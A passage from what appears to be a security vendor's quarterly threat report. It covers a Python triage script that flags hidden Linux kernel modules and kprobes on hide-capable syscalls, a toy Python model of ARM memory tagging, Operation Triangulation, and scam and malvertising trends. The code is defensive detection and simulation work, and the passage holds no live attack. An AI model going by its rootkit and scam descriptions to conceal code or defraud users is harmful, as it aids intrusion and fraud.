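    """/proc/modules lines: '<name> <size> <refcount> <deps> <state> <address>'."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}


def triage(kprobes_text: str, proc_modules_text: str, sys_module_loaded: Set[str]) -> List[str]:
    """Return findings.  `sys_module_loaded` = names under /sys/module that have an
    initstate file (built-in code has a directory there too, but no initstate)."""
    visible = parse_proc_modules(proc_modules_text)
    findings = [f"hidden module: /sys/module/{name}/initstate exists but {name} is missing from /proc/modules"
                for name in sorted(sys_module_loaded - visible)]
    for kp in parse_kprobes_list(kprobes_text):
        if "[GONE]" in kp.flags:                   # probed code was unloaded; the probe cannot fire
            continue
        if kp.symbol in SENSITIVE_SYMBOLS:
            # kprobes/list names the probed symbol's module, not the registrant, so a
            # hook here must be correlated with the tracing tools known to be running.
            findings.append(f"suspicious kprobe: {kp.kind} on {kp.symbol}+0x{kp.offset:x} "
                            f"{kp.flags or '(no flags)'}: a hide-capable syscall is hooked")
    return findings


def collect_from_host() -> List[str]:
    """Run the same triage on the live machine (needs root and debugfs mounted)."""
    with open("/proc/modules") as f:
        proc_modules = f.read()
    with open("/sys/kernel/debug/kprobes/list") as f:
        kprobes = f.read()
    loaded = {m for m in os.listdir("/sys/module") if os.path.exists(f"/sys/module/{m}/initstate")}
    return triage(kprobes, proc_modules, loaded)


# --- constructed sample snapshot: 'rtl8xxx_nic' plays the Realtek look-alike ---
SAMPLE_PROC_MODULES = """\
e1000 163840 0 - Live 0xffffffffc0a00000
xfs 1642496 2 - Live 0xffffffffc0500000
"""
SAMPLE_SYS_MODULE_LOADED = {"e1000", "xfs", "rtl8xxx_nic"}
SAMPLE_KPROBES = """\
ffffffff812a1f40  k  __x64_sys_getdents64+0x0
ffffffff812a3b10  k  __x64_sys_kill+0x0
ffffffff81c0e820  r  do_sys_openat2+0x0    [FTRACE]
ffffffffc0501230  k  xfs_file_open+0x0  xfs [OPTIMIZED][FTRACE]
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_KPROBES, SAMPLE_PROC_MODULES, SAMPLE_SYS_MODULE_LOADED):
        print(finding)
```

<p>On the constructed snapshot the script reports the module present in <code>/sys/module</code> but absent from <code>/proc/modules</code>, plus the two kprobes on <code>getdents64</code> and <code>kill</code>; the legitimate ftrace and filesystem probes produce no findings. A rootkit that also removes its kobject defeats the first check, which is why the kprobe listing is worth collecting alongside it.</p>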
  4085.  
  4086.  
  4087.  
  4088. <p>We will continue tracking lightweight Linux kernel rootkits used by APT groups in the next quarter.</p>
  4089.  
  4090.  
  4091.  
  4092. <p class="has-text-align-right"><em><em>Martin Chlumecký</em>, Malware Researcher</em><br><em>David Álvarez, Malware Analyst</em></p>
  4093.  
  4094.  
  4095.  
  4096. <h3 class="wp-block-heading">Vulnerabilities and Exploits</h3>
  4097.  
  4098.  
  4099.  
  4100. <p><em>Exploits take advantage of flaws in legitimate software to perform actions that should not be allowed. They are typically categorized into remote code execution (RCE) exploits, which allow attackers to infect another machine, and local privilege escalation (LPE) exploits, which allow attackers to take more control of a partially infected machine.</em></p>
  4101.  
  4102.  
  4103.  
4104. <p>In December 2023, Kaspersky researchers <a href="https://media.ccc.de/v/37c3-11859-operation_triangulation_what_you_get_when_attack_iphones_of_researchers" target="_blank" rel="noreferrer noopener">presented</a> more details about <a href="https://securelist.com/trng-2023/" target="_blank" rel="noreferrer noopener">Operation Triangulation</a> at the 37th Chaos Communication Congress (37C3). This attack, which targeted Kaspersky among other entities, utilized several zero-day exploits, starting with an iMessage zero-click. Because Kaspersky managed to recover the whole infection chain, this research provides fascinating insights into the techniques employed by highly sophisticated nation-state attackers. We learned that the attack featured not one but two separate validator stages, meant to protect the exploits (and implants) with public-key encryption and to ensure they were only deployed in the targeted environment.</p>
  4105.  
  4106.  
  4107.  
4108. <p>Another interesting finding was that, after successfully exploiting the kernel, the attackers used their newfound privileges merely to open Safari and run a browser exploit, essentially exploiting the same device twice. At first glance, dropping privileges like this doesn&#8217;t make much sense, and it&#8217;s a bit of a mystery why the attack was designed this way. One theory is that the attackers had two chains and wanted the best of both (the first had the iMessage RCE, the second had the validators), so they took the path of least resistance to connect them. However, we suspect this may also have been a deliberate attempt to protect the most expensive part of the attack: the zero-click iMessage exploit. If a victim discovered the implant and tried to trace the infection back, they would most likely have found nothing beyond the browser exploit, as hardly anyone would suspect that a browser exploit chain had been launched from the kernel. So, while the attackers would still burn a lot of zero-days, they would retain the most valuable one. Whatever the reason, one thing is certain: this attacker must have no shortage of browser zero-days if they are willing to risk burning one even when it&#8217;s unnecessary.</p>
  4109.  
  4110.  
  4111.  
  4112. <h6 class="wp-block-heading">MTE Support on Pixel 8</h6>
  4113.  
  4114.  
  4115.  
4116. <p>Another interesting development happened in October, when Google&#8217;s Pixel 8 was released with <a href="https://googleprojectzero.blogspot.com/2023/11/first-handset-with-mte-on-market.html" target="_blank" rel="noreferrer noopener">support for MTE</a> (Memory Tagging Extension). This represents a significant milestone, as it is the first commercially available device to support this much-anticipated ARM mitigation.</p>
  4117.  
  4118.  
  4119.  
4120. <p>While it&#8217;s not enabled by default, MTE can be turned on as a developer option for testing purposes. This allows developers to verify that their application behaves correctly and that MTE does not cause any unexpected errors. The main idea behind MTE is to assign a 4-bit tag to each allocated 16-byte granule of memory. Pointers carry the matching tag in their otherwise unused top byte, so the tag can be checked whenever the pointer is dereferenced; if the pointer&#8217;s tag does not match the granule&#8217;s tag, an exception is raised. This could <a href="https://googleprojectzero.blogspot.com/2023/08/mte-as-implemented-part-1.html" target="_blank" rel="noreferrer noopener">mitigate a number of vulnerability classes</a>, such as use-after-free bugs, because the tag is updated between allocations, so a stale pointer&#8217;s tag will usually be outdated by the time the vulnerability is triggered (although with only 16 possible tag values there is still a roughly one-in-sixteen chance that the stale tag happens to match).</p>
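<p>The following Python model is an added illustration of the mechanism just described; it is not code from the report, from Google or from ARM, and it runs on any CPU. It simulates 4-bit allocation tags on 16-byte granules, a logical tag in bits 56..59 of the pointer, and the tag comparison on every access. The allocator policy (retag on free, exclude the freed tag and the neighbours' tags when choosing a new one) is an assumption loosely modelled on MTE-aware allocators, not a description of any particular implementation. It makes the distinction in the paragraph above concrete: adjacent overflows, double frees and use-after-free before the chunk is reused always fault, while a stale pointer used after the chunk has been reallocated slips through roughly one time in fourteen to sixteen.</p>

```python
"""Toy model of ARM MTE with synchronous tag checking: 16-byte granules carry a 4-bit
allocation tag, pointers carry the matching logical tag in bits 56..59, and every access
compares the two.  Not real MTE (runs on any CPU, seeded RNG for reproducibility); the tag
policy (retag on free, exclude freed and neighbour tags) is an assumption of this model."""
import random
from typing import Dict, List

GRANULE = 16      # bytes covered by one allocation tag
TAG_SHIFT = 56    # logical tag lives in the pointer's top byte
TAG_BITS = 0xF    # 4-bit tags: only 16 possible values

class TagCheckFault(Exception):
    """Pointer's logical tag does not match the granule's allocation tag."""

def tag_of(ptr: int) -> int:
    return (ptr >> TAG_SHIFT) & TAG_BITS

def address_of(ptr: int) -> int:
    return ptr & ((1 << TAG_SHIFT) - 1)

class TaggedHeap:
    """One size class: `chunks` chunks of `chunk_granules` granules, LIFO free list."""

    def __init__(self, chunks: int, chunk_granules: int, rng: random.Random):
        self.chunk_granules = chunk_granules
        self.tags: List[int] = [0] * (chunks * chunk_granules)   # allocation tag per granule
        self.free_list: List[int] = list(range(chunks))[::-1]    # pop() hands out chunk 0 first
        self.rng = rng

    def _retag(self, base: int, exclude: set) -> int:
        tag = self.rng.choice([t for t in range(16) if t not in exclude])
        for g in range(base, base + self.chunk_granules):
            self.tags[g] = tag
        return tag

    def alloc(self) -> int:
        base = self.free_list.pop() * self.chunk_granules
        end = base + self.chunk_granules
        # Never reuse the tag the chunk carried while free, and differ from both
        # neighbours so that a linear overflow into them faults.
        exclude = {self.tags[base]}
        if base > 0:
            exclude.add(self.tags[base - 1])
        if end < len(self.tags):
            exclude.add(self.tags[end])
        return (self._retag(base, exclude) << TAG_SHIFT) | (base * GRANULE)

    def free(self, ptr: int) -> None:
        self.access(ptr, 0, 1)                         # a double free faults here
        base = address_of(ptr) // GRANULE
        self._retag(base, {self.tags[base]})           # retag on free: dangling pointers stop matching
        self.free_list.append(base // self.chunk_granules)

    def access(self, ptr: int, offset: int, length: int) -> None:
        """The check the CPU performs on every load/store of `length` bytes at ptr+offset."""
        addr = address_of(ptr) + offset
        for g in range(addr // GRANULE, (addr + length - 1) // GRANULE + 1):
            if g >= len(self.tags) or self.tags[g] != tag_of(ptr):
                raise TagCheckFault(f"logical tag {tag_of(ptr):#x} does not match granule {g}")

def _faults(action) -> bool:
    try:
        action()
    except TagCheckFault:
        return True
    return False

def deterministic_cases(seed: int = 7) -> Dict[str, bool]:
    """Linear overflow, use-after-free before reuse and double free are always caught."""
    heap = TaggedHeap(chunks=4, chunk_granules=2, rng=random.Random(seed))
    size = heap.chunk_granules * GRANULE
    a, b = heap.alloc(), heap.alloc()                  # adjacent chunks
    results = {
        "in_bounds_ok": not _faults(lambda: heap.access(a, 0, size)),
        "overflow_into_neighbour_faults": _faults(lambda: heap.access(a, size, 1)),
        "neighbour_still_valid": not _faults(lambda: heap.access(b, 0, size)),
    }
    heap.free(a)
    results["uaf_before_reuse_faults"] = _faults(lambda: heap.access(a, 0, 1))
    results["double_free_faults"] = _faults(lambda: heap.free(a))
    return results

def uaf_after_reuse_miss_rate(trials: int = 2000, seed: int = 7) -> float:
    """The probabilistic case the text warns about: free `a`, let a new allocation take the
    same chunk, then read via the stale pointer.  Its tag collides about 1 in 14-16 times."""
    rng, missed = random.Random(seed), 0
    for _ in range(trials):
        heap = TaggedHeap(chunks=2, chunk_granules=1, rng=rng)
        a = heap.alloc()
        heap.free(a)
        b = heap.alloc()                               # LIFO free list: reuses a's chunk
        assert address_of(a) == address_of(b)
        if not _faults(lambda: heap.access(a, 0, 1)):
            missed += 1
    return missed / trials

if __name__ == "__main__":
    print(deterministic_cases())
    print(f"stale reads that slipped past the tag check: {uaf_after_reuse_miss_rate():.1%}")
```

<p>The miss rate returned by <code>uaf_after_reuse_miss_rate</code> is the quantitative form of the caveat above: excluding the freed tag makes an immediate use-after-free deterministic, but once the chunk is handed to a new allocation the stale pointer's tag is again one of roughly fourteen to sixteen candidates, so an attacker who can retry or spray allocations still has a real chance of a silent match.</p>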
  4121.  
  4122.  
  4123.  
4124. <p>Currently, the actual impact of MTE on the difficulty of exploiting memory corruption vulnerabilities remains unclear; however, it seems like a promising mitigation that might raise the bar for attackers. It&#8217;s also not clear whether it will ever be enabled by default, as it will undoubtedly incur some performance overhead and the additional security might not be worth it for the average user. However, it may still come in handy for users who suspect they are targeted by zero-day-capable attackers: at a time when MTE is not widely enabled, its unexpected presence would likely catch most attackers off guard.</p>
  4125.  
  4126.  
  4127.  
4128. <p class="has-text-align-right"><em>Jan Vojtěšek, Malware Researcher</em></p>
  4129.  
  4130.  
  4131.  
  4132. <h2 class="wp-block-heading">Web Threats</h2>
  4133.  
  4134.  
  4135.  
4136. <p>Looking at the detection statistics for the whole of 2023, web threats were the most active category of the year. Scams on a wide range of topics and of varying quality, distributed largely through malvertising, achieved a relatively large reach worldwide.</p>
  4137.  
  4138.  
  4139.  
4140. <p>Due to this, it is not surprising that scams, phishing, and malvertising together made up over 75% of all threats we blocked during the year.</p>
  4141.  
  4142.  
  4143.  
4144. <p>The combination of scams and malvertising is a powerful and dangerous one. As we describe in this section, scammers have also started adopting innovations from the fast-moving world of AI in hopes of improving their success rate.</p>
  4145.  
  4146.  
  4147.  
  4148. <h3 class="wp-block-heading">Scams&nbsp;</h3>
  4149.  
  4150.  
  4151.  
  4152. <p><em>A scam is a type of threat that aims to trick users into giving an attacker their personal information or money. We track diverse types of scams which are listed below.</em></p>
  4153.  
  4154.  
  4155.  
4156. <p>The malvertising business is booming, fueled by scammers&#8217; willingness to pay for delivery of their malicious content to victims. That willingness can only mean the scams pay for themselves: the money taken from scammed users covers the advertising spend.</p>
  4157.  
  4158.  
  4159.  
4160. <p>An interesting development was a surge in scam activity that started on 20 December and lasted until the end of the year.</p>
  4161.  
  4162.  
  4163. <div class="wp-block-image">
  4164. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7972" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_scam_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">General overview of Q4/2023 scam threat activity</figcaption></figure></div>
  4165.  
  4166.  
4167. <p>The reason for this pre-holiday surge was an unfortunately successful push notification campaign. Its landing page mimicked the familiar CAPTCHA check to get users to click through and grant the page permission to send push notifications.</p>
  4168.  
  4169.  
  4170. <div class="wp-block-image">
4171. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="385" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image-11-1024x385.png" alt="" class="wp-image-7973" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image-11-1024x385.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image-11-300x113.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image-11-768x288.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image-11.png 1257w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Example of the simple look of this landing page</figcaption></figure></div>
  4172.  
  4173.  
4174. <p>Avast has consistently drawn attention to the problem of scam push notifications. Last quarter we warned about a massive increase in malvertising, and that increase continued in the fourth quarter of the year.</p>
  4175.  
  4176.  
  4177. <div class="wp-block-image">
  4178. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7974" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4_malware_malvertising_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Malvertising activity compared to the previous quarter</figcaption></figure></div>
  4179.  
  4180.  
4181. <p>Once notification permission is granted, the scammer can steer the user wherever they like: from ordinary porn sites to financial scams, tech support scams, or even phishing sites.</p>
  4182.  
  4183.  
  4184.  
4185. <p>A notable example is the phishing campaign shown below, which originated on a similar landing page that convinced users to allow push notifications. The page typically pushed ads for adult content, but then came a seemingly authentic ad campaign targeting Spotify users.</p>
  4186.  
  4187.  
  4188. <div class="wp-block-image">
  4189. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="362" height="359" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpyXEAAJ1lk-e1707148582379.png" alt="" class="wp-image-7975" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpyXEAAJ1lk-e1707148582379.png 362w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpyXEAAJ1lk-e1707148582379-300x298.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpyXEAAJ1lk-e1707148582379-150x150.png 150w" sizes="(max-width: 362px) 100vw, 362px" /><figcaption class="wp-element-caption">Example of scam push-notification</figcaption></figure></div>
  4190.  
  4191.  
4192. <p>The phishing page kept up the impression of a genuine Spotify page, following the theme of the push notification, specifically a subscription renewal. It asked the user for a username and password, but also for credit card details including the verification code.</p>
  4193.  
  4194.  
  4195. <div class="wp-block-image">
  4196. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="1000" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpxXsAAhJVv-1024x1000.jpg" alt="" class="wp-image-7978" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpxXsAAhJVv-1024x1000.jpg 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpxXsAAhJVv-300x293.jpg 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpxXsAAhJVv-768x750.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/GC1MVpxXsAAhJVv.jpg 1276w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Phishing form page</figcaption></figure></div>
  4197.  
  4198.  
4199. <p>Overall, the dividing line between phishing, scams and malvertising is very thin, and the statistics only confirm the general growth of all three.</p>
  4200.  
  4201.  
  4202.  
  4203. <h3 class="wp-block-heading"><strong>Financial scams</strong></h3>
  4204.  
  4205.  
  4206.  
4207. <p>A big attraction in the world of scams in the fourth quarter was the massive deployment of AI-generated videos in ads for financial/investment scams, which we pointed out and described in more detail in our last report. These videos were initially of relatively low quality, but they gradually improved to a quite impressive level.</p>
  4208.  
  4209.  
  4210.  
4211. <p>Scammers are still using well-known faces to lure users into clicking malicious links. Classic campaigns feature the likes of Elon Musk, TV news reporters, and even heads of state, choosing public figures who are prominent in the country where the ad is displayed. In the following examples you can see deepfakes of the Czech President and of Ursula von der Leyen introducing a new investment platform.</p>
  4212.  
  4213.  
  4214. <div class="wp-block-image">
  4215. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="644" height="604" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/PP_AI.gif" alt="" class="wp-image-7981"/><figcaption class="wp-element-caption">Deep fake video of the Czech President Petr Pavel promoting registration on the investment portal</figcaption></figure></div>
  4216.  
  4217. <div class="wp-block-image">
  4218. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="685" height="824" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/von_der.png" alt="" class="wp-image-7982" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/von_der.png 685w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/von_der-249x300.png 249w" sizes="(max-width: 685px) 100vw, 685px" /><figcaption class="wp-element-caption">Deep fake video of Ursula von der Leyen introducing a new investment platform</figcaption></figure></div>
  4219.  
  4220.  
4221. <p>We have also seen advertisements that splice genuine footage of famous people into an edited video to provide context for the launch of a new product, but that is a different approach. The deepfakes shown here create a far more believable impression, because the generated figure explicitly speaks a scripted text and names the specific fraudulent sites.</p>
  4222.  
  4223.  
  4224.  
  4225. <p>Peak financial scam activity was observed in mid-November. Toward the end of the year, this activity slowly started to calm down.</p>
  4226.  
  4227.  
  4228. <div class="wp-block-image">
  4229. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7983" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-financial_scams_Q423_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Activity of financial scams in Q4</figcaption></figure></div>
  4230.  
  4231.  
4232. <p>We have drawn attention to these ads many times. Typically, they lead to fraudulent sites that back up the claims made in the ad and then redirect users to a registration form such as the one shown below.</p>
  4233.  
  4234.  
  4235. <div class="wp-block-image">
  4236. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="574" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-1024x574.png" alt="" class="wp-image-8022" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-1024x574.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-300x168.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-768x430.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-540x304.png 540w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36-344x194.png 344w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/image36.png 1358w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Example of scam registration site</figcaption></figure></div>
  4237.  
  4238.  
  4239. <h3 class="wp-block-heading">Dating Scams</h3>
  4240.  
  4241.  
  4242.  
  4243. <p><em>Dating scams, also known as romance scams or online dating scams, involve fraudsters deceiving individuals into fake romantic relationships. Scammers adopt fake online identities to gain the victim&#8217;s trust, with the ultimate goal of obtaining money or enough personal information to commit identity theft.</em></p>
  4244.  
  4245.  
  4246.  
4247. <p>Compared to the previous quarter, online dating scams increased significantly worldwide in Q4 2023, with notable shifts in attack patterns and targeted regions. Scam volume dipped temporarily during the holiday season, perhaps because people were preoccupied with festive celebrations and time spent with loved ones, but at the same time attackers shifted their focus to different countries, a distinct change in strategy.</p>
  4248.  
  4249.  
  4250. <div class="wp-block-image">
  4251. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1024x639.png" alt="" class="wp-image-7984" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/map_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Heatmap showing risk-ratio for Q4/2023</figcaption></figure></div>
  4252.  
  4253.  
4254. <p>The most substantial increase was observed in the Arab states, including Saudi Arabia, Yemen, Oman, the United Arab Emirates and Kuwait, as well as in Indonesia, Cambodia, and Thailand. This shift may be linked to the broader growth of online interaction in these regions: as people engage more extensively on online platforms, attackers adapt their strategies and target new regions to exploit the changing patterns of online activity.</p>
  4255.  
  4256.  
  4257. <div class="wp-block-image">
  4258. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7985" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_SA_2023_Q4-DatingScam-Q4_malware_scam_DatingScam_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Activity of DatingScam in Saudi Arabia</figcaption></figure></div>
  4259.  
  4260.  
4261. <p>Countries in Central Europe and North America continue to face dating scams the most, with roughly one in 20 users encountering them on average. The holiday-season decline has piqued our interest, and we anticipate a resurgence in the lead-up to Valentine&#8217;s Day, when the romantic occasion may make people more receptive to online connections and give attackers an opportune moment to exploit their emotions.</p>
  4262.  
  4263.  
  4264. <div class="wp-block-image">
  4265. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="768" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02-1024x768.png" alt="" class="wp-image-7986" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02-1024x768.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02-300x225.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02-768x576.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02-1536x1152.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/49395f2e-8ff9-495b-93e7-12a694d58ba4-blured02.png 1600w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">DatingScam example from Saudi Arabia</figcaption></figure></div>
  4266.  
  4267.  
  4268. <h3 class="wp-block-heading">Tech Support Scams</h3>
  4269.  
  4270.  
  4271.  
  4272. <p><em>Tech support scam threats involve fraudsters posing as legitimate technical support representatives who attempt to gain remote access to victims&#8217; devices or obtain sensitive personal information, such as credit card or banking details. These scams rely on confidence tricks to gain victims&#8217; trust and often involve convincing them to pay for unnecessary services or purchase expensive gift cards. It&#8217;s important for internet users to be vigilant and to verify the credentials of anyone claiming to offer technical support services.</em></p>
  4273.  
  4274.  
  4275.  
4276. <p>In the fourth quarter, tech support scam activity continued the downtrend we observed throughout 2023.</p>
  4277.  
  4278.  
  4279. <div class="wp-block-image">
  4280. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7987" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/daily_hits_normalized_2023_Q4-q_reports-TSS-Q423_clean2_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Graph illustrating a decline for 2 quarters</figcaption></figure></div>
  4281.  
  4282.  
4283. <p>Several countries in which we typically observe significant tech support scam activity registered significant declines in risk ratio. One exception is Spain, which came third in our quarterly ranking with a 42% increase in risk ratio in Q4 2023.</p>
  4284.  
  4285.  
  4286. <div class="wp-block-image">
